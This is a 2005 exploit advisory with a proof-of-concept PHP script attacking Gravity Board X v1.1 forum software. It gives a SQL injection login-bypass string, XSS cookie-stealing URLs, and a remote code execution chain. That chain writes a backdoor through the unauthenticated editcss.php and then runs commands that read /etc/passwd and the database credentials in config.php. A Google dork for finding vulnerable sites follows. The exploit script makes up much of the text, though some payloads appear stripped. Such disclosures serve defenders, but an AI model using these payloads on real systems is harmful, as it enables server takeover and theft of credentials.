4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: A user can bypass the login check and gain administrator privileges on the target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1) After he logs in as administrator he can edit the template to insert evil javascript code. Try to insert at the end of the template these lines: b.2) A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id="> c) Remote commands/php code execution: c.1) By editing the template, the attacker can leave a backdoor on the target system, for example at the end of the template: Afterwards, the attacker can launch commands through urls like these: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see the Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see the database username/password c.2) An IMPORTANT NOTE: You can edit the template without being logged in as administrator, by calling the editcss.php script directly; look at the code of this script, which writes the submitted csscontent straight to gbxfinal.css: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } a user can easily deface the forum and/or insert a backdoor by calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] this is my php exploit code, run it from Apache: Gravity Board X v1.1 remote commands execution

Gravity Board X v1.1 (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /flatnuke/forum/ or /forum/ or just /)

specify a port other than 80 (default value)

a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file

send exploit through an HTTP proxy (ip:port)

'; /* show(): hex/ASCII dump of $headeri, 16 bytes per row; the main script calls it on each request before sending so the operator can inspect the bytes. The echo statements that are empty here presumably held HTML table markup that was stripped when this listing was extracted -- confirm against the original advisory. */ function show($headeri) { /* $ii: byte index into $headeri; $ji: column inside the current 16-byte row; $ci: count of completed rows; $ki: looks like the byte offset of the row whose ASCII column is echoed -- verify. */ $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $htmli=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($htmli)==1) {echo "";} else {echo " ";} $ii++; $ji++; } /* pad the last row out to 16 cells, then echo its ASCII column */ for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$htmli."".$htmli."  ".$headeri[$li]."
"; } /* Entry point of the script. $host, $path, $port, $command and $proxy are never assigned in the visible code; presumably they arrive from the HTML form above via register_globals -- confirm. */ $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; /* proxy must look like ip:port; only the textual shape is checked, not octet or port ranges */ if ($proxy<>'') { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } } /* nothing is sent unless host, path and command are all non-empty */ if (($path<>'') and ($host<>'') and ($command<>'')) { //Gravity forum default template $template='A:link, A:visited, A:active { TEXT-DECORATION: none; COLOR: #E6B400; } A:hover { TEXT-DECORATION: underline; } p { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: transparent; } body { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: #101010; } /* FONTS */ .headerfont { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #DCDCDC; } .headerfont2 { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .categoryfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .mainlinkfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #006699; } .navfont { FONT-FAMILY: Arial; FONT-SIZE: 8pt; FONT-WEIGHT: bold; COLOR: #000000; } .navheader { FONT-FAMILY: Tahoma; FONT-SIZE: 14pt; FONT-WEIGHT: bold; COLOR: #000000; } .profilefont { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; } .small { FONT-FAMILY: Verdana; FONT-SIZE: 10px; } .subjectfont { FONT-FAMILY: Verdana; FONT-SIZE: 11px; COLOR: #006699; } .welcomefont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } /* MAIN TABLES */ .station { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #222222; } .main { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #181818; } .post { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 0px; BACKGROUND: #202020; BORDER-COLLAPSE: collapse; } /* OTHER */ .textbox { COLOR: #FFFFFF; background: #606060; border: 1px inset #C0C0C0; font-size: 8pt; FONT-FAMILY: Verdana; } .button { COLOR: #FFFFFF; BACKGROUND: #707070; FONT-FAMILY: Verdana; FONT-WEIGHT: bold; BORDER-STYLE: solid; BORDER-COLOR: #999999; BORDER-WIDTH: 2px; } /* TABLE CELLS */ .header { 
BACKGROUND-IMAGE: url(images/skin/header_dark.gif); } .row1 { BACKGROUND: #303030; PADDING: 4px; } .row2 { BACKGROUND: #202020; PADDING: 4px; } .row3 { BACKGROUND: #404040; PADDING: 4px; } .floatrow { BACKGROUND: #4A4A4A; PADDING: 4px; } .rollover { BACKGROUND: #808080; PADDING: 4px; CURSOR: hand; }'; /* Request 1: an unauthenticated GET to editcss.php whose csscontent parameter is the stock stylesheet. Per the advisory (c.2) the vulnerable editcss.php writes this to gbxfinal.css with no login check -- that missing check is the server-side fix, and an unauthenticated request carrying csscontent is the pattern to alert on. The urlencode("") appended right after the template is empty in this copy; the content appended there was evidently stripped during extraction. */ //setup new template if ($port=='') {$port=80;} $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.= $path."editcss.php?csscontent=".urlencode($template); //cut next line to reset template... $packet.= urlencode(""); $packet.=" HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); fclose($ock); /* Request 2: GET index.php with the command in the cmd parameter; the response is read to EOF and echoed below. */ $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.=$path."index.php?cmd=".urlencode($command)." HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); echo "If Gravity Forum is unpatched and vulnerable, now you will see ".htmlentities($command)." output inside html...
"; /* the target's response is HTML-escaped before it is echoed back to the operator's browser */ echo nl2br(htmlentities($html)); } ?> It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory googledork: "Powered by Gravity Board" rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://www.rgod.altervista.org/gravity.html